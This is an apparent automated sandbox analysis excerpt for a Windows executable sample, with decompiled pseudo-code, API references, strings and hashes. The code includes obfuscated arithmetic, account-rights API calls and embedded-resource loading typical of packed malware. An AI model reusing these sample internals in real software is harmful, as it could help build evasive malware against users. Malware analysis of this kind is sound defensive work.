					if(0x175b75a - ( *(_t560 + 0x54) & 0x0000ffff) !=  *(_t560 + 0x44) / (_t416 + 0x5b) * _t536) {
						asm("fild dword [0x463208]");
						E00423C80(_t419, 0xbadbad >> 5, _t599);
						asm("fldz");
						 *(_t560 + 0x14) = (0x5397829d *  *0x462f60 >> 0x20 >> 4 >> 0x1f) + (0x5397829d *  *0x462f60 >> 0x20 >> 4);
						asm("fild dword [esp+0x14]");
						asm("faddp st2, st0");
						asm("fsubp st1, st0");
						asm("fiadd dword [0x4631f4]");
						 *0x4631f4 = E00423D70((0x5397829d *  *0x462f60 >> 0x20 >> 4 >> 0x1f) + (0x5397829d *  *0x462f60 >> 0x20 >> 4), _t599 + st0);
					}
					_t516 = _t536;
					GetWindowRect(_t516, _t560 + 0x40);
					_t280 = GetSystemMetrics(0);
					asm("cdq");
					_t283 = GetSystemMetrics(1);
					asm("cdq");
					SetWindowPos(_t516, 0, _t280 +  *(_t560 + 0x40) -  *((intOrPtr*)(_t560 + 0x48)) -  *(_t560 + 0x40) -  *((intOrPtr*)(_t560 + 0x48)) >> 1, _t283 +  *(_t560 + 0x44) -  *((intOrPtr*)(_t560 + 0x4c)) -  *(_t560 + 0x40) -  *((intOrPtr*)(_t560 + 0x48)) >> 1, 0, 0, 1);
					 *(_t560 + 0x1a0) = 1;
					E0040AA00(_t560 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t560 + 0x34)))),  *((intOrPtr*)(_t560 + 0x34)));
					_push( *((intOrPtr*)(_t560 + 0x34)));
					E00422493();
					_t475 =  *0x462f64; // 0x0
					_t425 =  *0x4631f8; // 0x2a8
					_t517 =  *0x46320c; // 0x0
					_t549 =  *0x460334; // 0xc30c4
					_t539 =  *0x4631ec; // 0x0
					_t561 = _t560 + 4;
					_t476 = _t475 - _t425;
					if(_t476 == 0) {
						_t292 =  *0x4631e4; // 0x0
						asm("cdq");
						_t135 = _t517 + 0x48; // 0x48
						 *(_t561 + 0x14) = ((0x22983759 *  *0x463200 >> 0x20) -  *0x463200 >> 5 >> 0x1f) + ((0x22983759 *  *0x463200 >> 0x20) -  *0x463200 >> 5) - _t292 / _t135;
						asm("cdq");
						_t145 = _t517 + 0x43; // 0x43
						_t549 =  *0x460334; // 0xc30c4
						_t476 = (0x88888889 * _t539 >> 0x20) + _t539 >> 4;
						_t427 = (_t476 >> 0x1f) + _t476 +  *0x4631fc +  *(_t561 + 0x14) - _t549 / _t145 + _t425 * 2 +  *0x462f8c;
						__eflags = _t427;
						 *0x4631f8 = _t427;
					} else {
						_t442 =  *0x462f8c; // 0x4770000
						 *0x462f64 = _t442 +  *0x4631dc;
					}
					_t309 =  *0x463208; // 0x0
					_t392 =  *0x462f60; // 0x3b8402f
					asm("cdq");
					_t429 =  *0x4631e8; // 0x789
					_t315 =  *0x4631e4; // 0x0
					 *0x463208 = (_t392 & 0x000000ff) + (_t309 + (_t476 & 0x0000000f) >> 4) - (_t539 & 0x0000ffff) - (_t549 & 0x0000ffff) +  *0x462740;
					asm("cdq");
					_t431 =  *0x4631d8; // 0xfff48ebd
					_t317 =  *0x4631f4; // 0xfff48ebd
					if(_t431 - _t315 / (_t429 + 0x50) < _t317) {
						 *0x462b3c =  *0x462b3c - _t317;
					}
					if( *0x462b40 != 0) {
						_t162 = _t517 + 0x41; // 0x41
						 *(_t561 + 0x14) = _t162;
						asm("cdq");
						 *0x462f64 =  *0x462f64 - _t392 /  *(_t561 + 0x14) + _t549;
					}
					if(_t539 + _t517 != 0) {
						_t550 =  *(_t561 + 0x2c);
						_t318 = _t550 + _t431;
						_t432 =  *0x4631f4; // 0xfff48ebd
						_t431 = _t432 + 1;
						_t319 = _t318 * (_t432 + 1);
						__eflags = _t319;
						 *0x4631d8 = _t319;
					} else {
						_t343 = GetLastError();
						_t517 =  *0x46320c; // 0x0
						_t550 =  *(_t561 + 0x2c);
						 *0x4631fc = _t343;
					}
					_t320 = E00423BF4(_t431, 0x7d0, 0x1000);
					_t173 = _t517 + 1; // 0x1
					_t562 = _t561 + 8;
					 *((intOrPtr*)(_t562 + 0x14)) = _t320;
					if(_t173 == 0) {
						 *0x4631d8 = _t517 + (2 -  *0x463210) * 2;
					} else {
						_t335 =  *0x4631f4; // 0xfff48ebd
						_t543 =  *0x463210; // 0x0
						 *(_t562 + 0x30) = _t335;
						 *((intOrPtr*)(_t562 + 0x54)) = 0;
						 *(_t562 + 0x58) = 0;
						 *((intOrPtr*)(_t562 + 0x5c)) = 0x100;
						 *((intOrPtr*)(_t562 + 0x60)) = 0;
						 *(_t562 + 0x64) = 0;
						SetRect(_t562 + 0x64, 0, 0, 0, 0);
						_t337 = SendMessageA(_t543, 0x418, 0, 0);
						_t517 =  *0x46320c; // 0x0
						_t553 = _t337;
						if(_t517 != 0 &&  *((intOrPtr*)(_t562 + 0x5c)) -  *((intOrPtr*)(_t562 + 0x54)) <  *((intOrPtr*)(_t562 + 0x1c))) {
							do {
								SendMessageA(_t543, 0x414, 1, _t562 + 0x40);
								SendMessageA(_t543, 0x41d, _t553, _t562 + 0x74);
								UnionRect(_t562 + 0x58, _t562 + 0x58, _t562 + 0x74);
								_t553 = _t553 + 1;
							} while ( *((intOrPtr*)(_t562 + 0x5c)) -  *((intOrPtr*)(_t562 + 0x54)) <  *((intOrPtr*)(_t562 + 0x1c)));
							_t517 =  *0x46320c; // 0x0
						}
						_t550 =  *(_t562 + 0x2c);
					}
					_t323 =  *((intOrPtr*)(_t562 + 0x14));
					if(_t323 != 0) {
						_t332 =  *0x4631d8; // 0xfff48ebd
						 *0x462f60 = _t323 + _t517 + 0xf;
						 *0x4631f4 =  *0x4631f4 + _t332 + _t517 +  *0x463210;
					}
					if(_t517 != 0) {
						_t541 = FindResourceA(_t550, _t562 + 0x88, 0x462a28);
						LockResource(LoadResource(_t550, _t541));
						SizeofResource(_t550, _t541);
						_t517 =  *0x46320c; // 0x0
					} else {
						_t438 =  *0x462f60; // 0x3b8402f
						 *0x4631f0 = _t438;
					}
					_t551 = _t550 +  *0x4631d8;
					_t328 =  *0x4631fc; // 0x789
					_t329 = _t328 +  *0x463200;
					_t200 = _t551 + 1; // 0x1
					_t493 = _t517 + _t200;
					 *0x4631fc = _t329;
					if(_t517 + _t200 != 0) {
						 *0x4631e8 = _t329;
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t562 + 0x18c));
					_pop(_t518);
					_pop(_t542);
					_pop(_t393);
					return E004230EF(0, _t393,  *(_t562 + 0x174) ^ _t562, _t493, _t518, _t542);
				}
			}

0x0040ac10
0x0040ac10
0x0040ac12
0x0040ac1d
0x0040ac1e
0x0040ac24
0x0040ac2b
0x0040ac32
0x0040ac34
0x0040ac35
0x0040ac36
0x0040ac3d
0x0040ac45
0x0040ac4b
0x0040ac52
0x0040ac54
0x0040ac5a
0x0040ac60
0x0040ac6d
0x0040ac77
0x0040ac7b
0x0040ac7d
0x0040ac7d
0x0040ac99
0x0040ac9d
0x0040aca6
0x0040acb0
0x0040acb6
0x0040acba
0x0040acc1
0x0040accf
0x0040acd3
0x0040acd6
0x0040ace2
0x0040ace4
0x0040acea
0x0040acea
0x0040acfd
0x0040ad03
0x0040ad0f
0x0040ad15
0x0040ad43
0x0040ad50
0x0040ad55
0x0040ad57
0x0040ad5b
0x0040ad5f
0x0040ad60
0x0040ad6b
0x0040ad6d
0x0040ad6e
0x0040ad6f
0x0040ad62
0x0040ad62
0x0040ad63
0x0040ad64
0x0040ad64
0x0040ad74
0x0040ad74
0x0040ad76
0x0040ad78
0x0040ad7c
0x0040ad80
0x0040ad84
0x0040ad8b
0x0040ad8f
0x0040ad93
0x0040ad97
0x0040ad9b
0x0040ad9f
0x0040ada3
0x0040ada9
0x0040adab
0x0040adad
0x0040adb2
0x0040adb6
0x0040adba
0x0040adc7
0x0040adcb
0x0040add4
0x0040addc
0x0040ade0
0x0040ade4
0x0040aded
0x0040adf2
0x0040adf6
0x0040adfa
0x0040adfc
0x0040ae02
0x0040ae06
0x0040ae0e
0x0040ae12
0x0040ae12
0x0040ae17
0x0040ae1d
0x0040ae29
0x0040ae2f
0x0040ae39
0x0040ae3f
0x0040ae45
0x0040ae4b
0x0040ae58
0x0040ae66
0x0040ae6d
0x0040ae7b
0x0040ae86
0x0040ae8c
0x0040ae98
0x0040ae9c
0x0040aea0
0x0040aea7
0x0040aeac
0x0040aeb0
0x0040aebd
0x0040aecd
0x0040aed1
0x0040aed5
0x0040aed7
0x0040aedd
0x0040aee1
0x0040aee6
0x0040aeee
0x0040aef4
0x0040aef8
0x0040af24
0x0040af4b
0x0040af69
0x0040af69
0x0040aefa
0x0040af02
0x0040af1b
0x0040af1b
0x0040af6b
0x0040af72
0x0040af77
0x0040af7d
0x0040af81
0x0040af86
0x0040af8b
0x0040af8f
0x0040af93
0x0040af98
0x0040af9c
0x0040afa2
0x0040afa6
0x0040afaa
0x0040afae
0x0040afb0
0x0040afb0
0x0040afb6
0x0040afba
0x0040afbe
0x0040afc4
0x0040afc6
0x0040afc6
0x0040afcc
0x0040afd3
0x0040afd7
0x0040afd7
0x0040afdd
0x0040afe2
0x0040afeb
0x0040aff5
0x0040affb
0x0040affb
0x0040b000
0x0040b000
0x0040b00a
0x0040b00c
0x0040b010
0x0040b015
0x0040b01a
0x0040b50b
0x0040b50f
0x0040b519
0x0040b51e
0x0040b526
0x0040b52b
0x0040b52c
0x0040b52d
0x0040b52e
0x0040b52f
0x0040b530
0x0040b536
0x0040b539
0x0040b53f
0x0040b020
0x0040b020
0x0040b024
0x0040b02a
0x0040b031
0x0040b038
0x0040b040
0x0040b048
0x0040b04d
0x0040b052
0x0040b059
0x0040b061
0x0040b069
0x0040b06e
0x0040b072
0x0040b075
0x0040b079
0x0040b07d
0x0040b080
0x0040b08c
0x0040b090
0x0040b09b
0x0040b09f
0x0040b0a3
0x0040b0a6
0x0040b0aa
0x0040b0b2
0x0040b0b3
0x0040b0bc
0x0040b0c4
0x0040b0cd
0x0040b0d4
0x0040b0d8
0x0040b0dd
0x0040b0e1
0x0040b0e9
0x0040b0f3
0x0040b0f4
0x0040b0f8
0x0040b0fc
0x0040b100
0x0040b109
0x0040b10e
0x0040b113
0x0040b11f
0x0040b129
0x0040b12f
0x0040b135
0x0040b13d
0x0040b158
0x0040b168
0x0040b16a
0x0040b170
0x0040b175
0x0040b18e
0x0040b192
0x0040b196
0x0040b198
0x0040b19a
0x0040b1a5
0x0040b1a5
0x0040b1af
0x0040b1b2
0x0040b1ba
0x0040b1c7
0x0040b1ce
0x0040b1db
0x0040b1e9
0x0040b200
0x0040b207
0x0040b210
0x0040b211
0x0040b216
0x0040b21c
0x0040b222
0x0040b228
0x0040b22e
0x0040b234
0x0040b237
0x0040b239
0x0040b24f
0x0040b254
0x0040b255
0x0040b279
0x0040b27f
0x0040b280
0x0040b289
0x0040b29a
0x0040b2af
0x0040b2af
0x0040b2b5
0x0040b23b
0x0040b23b
0x0040b247
0x0040b247
0x0040b2bb
0x0040b2c0
0x0040b2c6
0x0040b2df
0x0040b2ea
0x0040b2ef
0x0040b2f5
0x0040b2fb
0x0040b305
0x0040b30c
0x0040b30e
0x0040b30e
0x0040b31b
0x0040b31d
0x0040b320
0x0040b326
0x0040b32d
0x0040b32d
0x0040b335
0x0040b34e
0x0040b352
0x0040b355
0x0040b35b
0x0040b35c
0x0040b35c
0x0040b35f
0x0040b337
0x0040b337
0x0040b33d
0x0040b343
0x0040b347
0x0040b347
0x0040b36e
0x0040b373
0x0040b376
0x0040b379
0x0040b37f
0x0040b47a
0x0040b385
0x0040b385
0x0040b38a
0x0040b39b
0x0040b39f
0x0040b3a3
0x0040b3a7
0x0040b3af
0x0040b3b3
0x0040b3b7
0x0040b3cb
0x0040b3cd
0x0040b3d3
0x0040b3d7
0x0040b3f0
0x0040b3fd
0x0040b40b
0x0040b41a
0x0040b424
0x0040b425
0x0040b42b
0x0040b42b
0x0040b431
0x0040b431
0x0040b435
0x0040b43b
0x0040b441
0x0040b44e
0x0040b454
0x0040b454
0x0040b45c
0x0040b496
0x0040b4a1
0x0040b4a9
0x0040b4af
0x0040b45e
0x0040b45e
0x0040b464
0x0040b464
0x0040b4b5
0x0040b4bb
0x0040b4c0
0x0040b4c6
0x0040b4c6
0x0040b4ca
0x0040b4d1
0x0040b4d3
0x0040b4d3
0x0040b4e1
0x0040b4e9
0x0040b4ea
0x0040b4ec
0x0040b501
0x0040b501

APIs

ImageList_Create.COMCTL32(00000010,00000010,00000000,00000003,00000000,B51EC2B3,00000000,00000000,?,00000000), ref: 0040AC71
LoadBitmapA.USER32 ref: 0040AC90
ImageList_Add.COMCTL32(00000000,00000000,00000000,?,00000000), ref: 0040AC9D
DeleteObject.GDI32(00000000), ref: 0040ACA6
LoadBitmapA.USER32 ref: 0040ACB0
ImageList_Add.COMCTL32(00000000,00000000,00000000,?,00000000), ref: 0040ACBA
DeleteObject.GDI32(?), ref: 0040ACC1
LoadBitmapA.USER32 ref: 0040ACCB
ImageList_Add.COMCTL32(00000000,00000000,00000000,?,00000000), ref: 0040ACD3
DeleteObject.GDI32(00000000), ref: 0040ACD6
ImageList_GetImageCount.COMCTL32(00000000,?,00000000), ref: 0040ACD9
SendMessageA.USER32 ref: 0040ACFD
GetClientRect.USER32(00000000,?), ref: 0040AD0F
CreateWindowExA.USER32 ref: 0040AD43
LsaAddAccountRights.ADVAPI32(00000000,?,?,00000000), ref: 0040AD64
LsaRemoveAccountRights.ADVAPI32(00000000,?,00000000,?,00000000), ref: 0040AD6F
IsWinEventHookInstalled.USER32 ref: 0040AE17
OpenThemeData.UXTHEME(00000000,EDIT,?,00000000), ref: 0040AE2F
SetWindowLongA.USER32 ref: 0040AE39
GetWindowRect.USER32 ref: 0040AE4B
GetSystemMetrics.USER32 ref: 0040AE58
GetSystemMetrics.USER32 ref: 0040AE6D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0040AE86
IsZoomed.USER32(00000000), ref: 0040AF77
GetForegroundWindow.USER32(?,00000000), ref: 0040AFD7
GetWindowLongA.USER32 ref: 0040AFE2
SetActiveWindow.USER32(00000000,?,00000000), ref: 0040AFEB
SetWindowLongA.USER32 ref: 0040AFF5
__floor_pentium4.LIBCMT ref: 0040B080
ImageList_Create.COMCTL32(00000010,000C30C4,00000000,0002AD58,00000000,?,?,?,?,?,?,00000000), ref: 0040B11F
GetWindowRect.USER32 ref: 0040B1B2
GetSystemMetrics.USER32 ref: 0040B1BA
GetSystemMetrics.USER32 ref: 0040B1CE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,?,00000000), ref: 0040B1E9
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0040B337
_calloc.LIBCMT ref: 0040B36E
SetRect.USER32 ref: 0040B3B7
SendMessageA.USER32 ref: 0040B3CB
SendMessageA.USER32 ref: 0040B3FD
SendMessageA.USER32 ref: 0040B40B
UnionRect.USER32 ref: 0040B41A
FindResourceA.KERNEL32(?,?,00462A28), ref: 0040B490
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040B49A
LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040B4A1
SizeofResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040B4A9
std::exception::exception.LIBCMT ref: 0040B50F
__CxxThrowException@8.LIBCMT ref: 0040B526

Strings

(F, xrefs: 0040AF61
(F, xrefs: 0040AE90
SysTreeView32, xrefs: 0040AD3C
EDIT, xrefs: 0040AE23
Tree View, xrefs: 0040AD37
(*F, xrefs: 0040AEFA

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Window$Image$List_$Rect$LoadMessageMetricsResourceSendSystem$BitmapCreateDeleteLongObject$AccountRights$ActiveClientCountDataErrorEventException@8FindForegroundHookInstalledLastLockOpenRemoveSizeofThemeThrowUnionZoomed__floor_pentium4_callocstd::exception::exception
String ID: (F$ (F$(*F$EDIT$SysTreeView32$Tree View
API String ID: 2847583863-3576791171
Opcode ID: 071a44e0cc8b37caa810ef03b721f1b3e344cfd8c46c2df045e5024c63a586da
Instruction ID: 917e9b6e6cddb140ecd37b224c4af24802baf6df83b52463e887670bf8b7db06
Opcode Fuzzy Hash: 071a44e0cc8b37caa810ef03b721f1b3e344cfd8c46c2df045e5024c63a586da
Instruction Fuzzy Hash: 6742AF716043419FC304CF29DD85A5BBBE5FB89705F00892EF985973A1EBB4EA04CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D360 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 235
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040D360(void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, char _a12) {
				int _v0;
				signed int _v4;
				signed int _v20;
				intOrPtr _v48;
				struct tagMSG _v76;
				intOrPtr _v80;
				signed int _v120;
				char _v132;
				struct HWND__* _v140;
				struct HWND__* _v144;
				char _v148;
				char _v204;
				intOrPtr _v212;
				struct HWND__* _v216;
				struct HWND__* _v220;
				char _v228;
				intOrPtr _v236;
				struct HWND__* _v240;
				struct HICON__* _v244;
				struct _WNDCLASSA _v284;
				char _v288;
				char _v292;
				void* _v296;
				void* _v308;
				struct HINSTANCE__* _v312;
				void* __ebx;
				void* __esi;
				signed int _t76;
				void* _t86;
				int _t99;
				struct HWND__* _t105;
				int _t108;
				intOrPtr _t112;
				int _t117;
				intOrPtr* _t132;
				intOrPtr* _t135;
				int _t153;
				int _t154;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				int _t163;
				struct HWND__* _t164;
				void* _t166;
				struct HMENU__* _t167;
				signed int _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				void* _t173;

				_t173 = __eflags;
				_t166 = __ebp;
				_t157 = __edi;
				_t169 =  &_v296;
				_t76 =  *0x4608e0; // 0xb51ec2b3
				_v4 = _t76 ^ _t169;
				_v288 = 0;
				_t159 = _a4;
				_v296 = _t159;
				_v292 = _a12;
				_v228 = 0x452244;
				_v212 = 0x451704;
				_v132 = 0x451ad4;
				_v220 = 0;
				_v216 = 0;
				E00401A40(__ebp);
				_v76.hwnd =  &_v204;
				_v76.message = 0;
				_v76.message = E00403780(_t173, 0x20);
				if(_v80 == 0) {
					E004018F0( &_v132, __edi, _t159, _v120 | 0x00000004, 0);
				}
				_t22 = _v212 + 4; // 0x50
				 *((intOrPtr*)(_t169 +  *_t22 + 0x5c)) = 0x45146c;
				_t25 =  &_v228; // 0x452244
				 *((intOrPtr*)(_t169 +  *((intOrPtr*)( *_t25 + 4)) + 0x4c)) = 0x451adc;
				_t30 = _v228 + 4; // 0x457df0
				 *((intOrPtr*)(_t169 +  *_t30 + 0x4c)) = 0x451b08;
				E00402460( &_v204, _t166);
				_v204 = 0x451584;
				_v144 = 0;
				_v140 = 0;
				_v284.hInstance = 3;
				_v284.hIcon = E0040CE10;
				_v284.hCursor = 0;
				_v284.hbrBackground = 0;
				_v284.lpszMenuName = _t159;
				_v284.lpszClassName = LoadIconA(0, 0x7f00);
				_v244 = LoadCursorA(0, 0x7f00);
				_t86 = GetStockObject(0);
				_push(0);
				_v244 = _t86;
				_push( &_v288);
				_push( &_v292);
				_v240 = 0;
				_v236 = 0x460338;
				_v288 = 1;
				_v284.style = 0;
				_v284.lpfnWndProc = 0;
				_v284.cbClsExtra = 0;
				L0043994C(); // executed
				if(RegisterClassA( &_v284) != 0) {
					_push("HOMEDRIVE");
					_t132 = E00424C06(0, _t157, _t159, __eflags);
					_t170 = _t169 + 4;
					_t57 = _t132 + 1; // 0x1
					_t160 = _t57;
					do {
						_t153 =  *_t132;
						_t132 = _t132 + 1;
						__eflags = _t153;
					} while (_t153 != 0);
					__eflags = _t132 - _t160;
					E00403F40(0x460354, _t89, _t132 - _t160);
					_push("HOMEPATH");
					_t135 = E00424C06(0, _t157, _t160, __eflags);
					_t171 = _t170 + 4;
					_t58 = _t135 + 1; // 0x1
					_t161 = _t58;
					do {
						_t154 =  *_t135;
						_t135 = _t135 + 1;
						__eflags = _t154;
					} while (_t154 != 0);
					E00403F40(0x460354, _t91, _t135 - _t161);
					E00403F40(0x460354, "  -  ", 5);
					E004048A0( &_v244, 0x104);
					E00403E50(0x460354, E0040CBB0( &(_v76.wParam)), 0, 0xffffffff);
					__eflags = _v76.lParam - 0x10;
					if(_v76.lParam >= 0x10) {
						_push(_v48);
						E00422493();
						_t171 = _t171 + 4;
					}
					_push(_t166);
					_push(_t157);
					_t167 = CreateMenu();
					_t99 = CreateMenu();
					_t158 = AppendMenuA;
					_t163 = _t99;
					AppendMenuA(_t163, 0, 0x1b59, ".");
					AppendMenuA(_t163, 0x800, 0, 0);
					AppendMenuA(_t163, 0, 0x1b5a, "&");
					AppendMenuA(_t167, 0x10, _t163, "&i");
					_t105 = CreateWindowExA(0, "Win", "Generator", 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, _t167, _v312, _v308); // executed
					_t164 = _t105;
					ShowWindow(_t164, _v0);
					UpdateWindow(_t164);
					_t156 =  &_v76;
					_t108 = GetMessageA( &_v76, 0, 0, 0);
					__eflags = _t108;
					if(_t108 != 0) {
						_t158 = TranslateMessage;
						_t167 = DispatchMessageA;
						do {
							TranslateMessage( &_v76);
							DispatchMessageA( &_v76);
							_t156 =  &_v76;
							_t117 = GetMessageA( &_v76, 0, 0, 0);
							__eflags = _t117;
						} while (_t117 != 0);
					}
					_t159 = _v76.wParam;
					E0040B980(0, _t158, _t167);
					_v148 = 0x451464;
					E0040DEC1( &_v148);
					_t172 = _t171 + 4;
					_pop(_t157);
					_t112 = _v76.wParam;
				} else {
					E0040B980(0, _t157, _t166);
					_t156 =  &_v148;
					_v148 = 0x451464;
					E0040DEC1( &_v148);
					_t172 = _t169 + 4;
					_t112 = 0;
				}
				return E004230EF(_t112, 0, _v20 ^ _t172, _t156, _t157, _t159);
			}

0x0040d360
0x0040d360
0x0040d360
0x0040d360
0x0040d366
0x0040d36d
0x0040d37e
0x0040d383
0x0040d391
0x0040d395
0x0040d399
0x0040d3a1
0x0040d3a9
0x0040d3b4
0x0040d3b8
0x0040d3bc
0x0040d3c5
0x0040d3d5
0x0040d3e1
0x0040d3ef
0x0040d404
0x0040d404
0x0040d40d
0x0040d410
0x0040d418
0x0040d41f
0x0040d42b
0x0040d42e
0x0040d43a
0x0040d445
0x0040d44d
0x0040d454
0x0040d45b
0x0040d463
0x0040d46b
0x0040d46f
0x0040d473
0x0040d483
0x0040d48e
0x0040d492
0x0040d498
0x0040d49d
0x0040d4a1
0x0040d4a6
0x0040d4a7
0x0040d4ab
0x0040d4b3
0x0040d4bb
0x0040d4bf
0x0040d4c3
0x0040d4c7
0x0040d4da
0x0040d50a
0x0040d514
0x0040d516
0x0040d519
0x0040d519
0x0040d520
0x0040d520
0x0040d522
0x0040d523
0x0040d523
0x0040d527
0x0040d530
0x0040d535
0x0040d53f
0x0040d541
0x0040d544
0x0040d544
0x0040d547
0x0040d547
0x0040d549
0x0040d54a
0x0040d54a
0x0040d557
0x0040d568
0x0040d576
0x0040d595
0x0040d59a
0x0040d5a2
0x0040d5ab
0x0040d5ac
0x0040d5b1
0x0040d5b1
0x0040d5ba
0x0040d5bb
0x0040d5be
0x0040d5c0
0x0040d5c2
0x0040d5d2
0x0040d5d6
0x0040d5e0
0x0040d5ee
0x0040d5f9
0x0040d62b
0x0040d638
0x0040d63c
0x0040d643
0x0040d652
0x0040d65a
0x0040d65c
0x0040d65e
0x0040d660
0x0040d666
0x0040d670
0x0040d678
0x0040d682
0x0040d687
0x0040d68f
0x0040d691
0x0040d691
0x0040d670
0x0040d695
0x0040d6a3
0x0040d6b0
0x0040d6bb
0x0040d6c0
0x0040d6c3
0x0040d6c4
0x0040d4dc
0x0040d4e3
0x0040d4e8
0x0040d4f0
0x0040d4fb
0x0040d500
0x0040d503
0x0040d503
0x0040d6dd

APIs

Part of subcall function 00401A40: std::locale::_Init.LIBCPMT ref: 00401A86
Part of subcall function 00401A40: std::_Lockit::_Lockit.LIBCPMT ref: 00401A99

Part of subcall function 00403780: std::_Lockit::_Lockit.LIBCPMT ref: 004037D9

LoadIconA.USER32(00000000,00007F00), ref: 0040D477
LoadCursorA.USER32 ref: 0040D487
GetStockObject.GDI32(00000000), ref: 0040D492
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040D4C7
RegisterClassA.USER32 ref: 0040D4D1
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040D4FB

Part of subcall function 004018F0: __CxxThrowException@8.LIBCMT ref: 00401913
Part of subcall function 004018F0: std::exception::exception.LIBCMT ref: 0040193C
Part of subcall function 004018F0: __CxxThrowException@8.LIBCMT ref: 0040195B
Part of subcall function 004018F0: std::exception::exception.LIBCMT ref: 0040197D
Part of subcall function 004018F0: __CxxThrowException@8.LIBCMT ref: 0040199C
Part of subcall function 004018F0: std::exception::exception.LIBCMT ref: 004019B9
Part of subcall function 004018F0: __CxxThrowException@8.LIBCMT ref: 004019D8

__wgetenv.LIBCMT ref: 0040D50F
__wgetenv.LIBCMT ref: 0040D53A
CreateMenu.USER32(?,?,00000001,00000001), ref: 0040D5BC
CreateMenu.USER32(?,?,00000001,00000001), ref: 0040D5C0
AppendMenuA.USER32 ref: 0040D5D6
AppendMenuA.USER32 ref: 0040D5E0
AppendMenuA.USER32 ref: 0040D5EE
AppendMenuA.USER32 ref: 0040D5F9
CreateWindowExA.USER32 ref: 0040D62B
ShowWindow.USER32(00000000,?), ref: 0040D63C
UpdateWindow.USER32(00000000), ref: 0040D643
GetMessageA.USER32 ref: 0040D65A
TranslateMessage.USER32(?), ref: 0040D678
DispatchMessageA.USER32 ref: 0040D682
GetMessageA.USER32 ref: 0040D68F
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040D6BB

Strings

Generator, xrefs: 0040D620
D"E, xrefs: 0040D418
- , xrefs: 0040D55E
HOMEPATH, xrefs: 0040D535
HOMEDRIVE, xrefs: 0040D50A
Win, xrefs: 0040D4AB, 0040D625

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Menu$AppendException@8MessageThrow$CreateWindowstd::exception::exception$Ios_base_dtorLoadLockitLockit::___wgetenvstd::_std::ios_base::_$ClassCursorDispatchGdiplusIconInitObjectRegisterShowStartupStockTranslateUpdatestd::locale::_
String ID: - $D"E$Generator$HOMEDRIVE$HOMEPATH$Win
API String ID: 2973694101-1579861242
Opcode ID: 4ac0e819082339b3fbdd187ac9206133f98fbb06655cbbdb4183bce680186e3c
Instruction ID: 1251b88ff0c4ee6e7496ea741079ff917d41a5098eff6546380a6c3f1b31d23e
Opcode Fuzzy Hash: 4ac0e819082339b3fbdd187ac9206133f98fbb06655cbbdb4183bce680186e3c
Instruction Fuzzy Hash: 859175B1504345AFD320DF55CC85B9BB7E8EB84709F00492EF589A7252E778A908CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF0 Relevance: 18.3, APIs: 1, Strings: 9, Instructions: 824
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E00407DF0(signed int* __ecx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed int _t148;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				void* _t187;
				signed int _t188;
				signed int _t189;
				signed int _t218;
				signed int* _t219;
				signed char _t272;
				void* _t273;
				void* _t274;
				signed int _t286;
				signed int _t318;
				signed int _t340;
				signed int _t344;
				signed int _t349;
				signed int _t350;
				signed int _t409;
				signed int _t420;
				signed int _t453;
				signed char _t459;
				CHAR* _t460;
				signed int _t489;
				signed int* _t490;
				void* _t492;
				void* _t493;
				signed int _t526;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				void* _t562;
				signed int _t563;
				signed int* _t565;
				void* _t588;
				signed int _t589;
				intOrPtr _t591;
				intOrPtr _t592;
				intOrPtr _t593;
				intOrPtr _t594;
				intOrPtr _t595;
				intOrPtr _t596;
				intOrPtr _t597;
				intOrPtr _t598;
				void* _t599;
				void* _t624;

				_t624 = __fp0;
				_push(0xffffffff);
				_push(E0044E0D5);
				_push( *[fs:0x0]);
				_t589 = _t588 - 0x94;
				_t146 =  *0x4608e0; // 0xb51ec2b3
				 *(_t589 + 0x90) = _t146 ^ _t589;
				_t148 =  *0x4608e0; // 0xb51ec2b3
				_push(_t148 ^ _t589);
				 *[fs:0x0] = _t589 + 0xa8;
				_t565 = __ecx;
				 *(_t589 + 0x28) = __ecx;
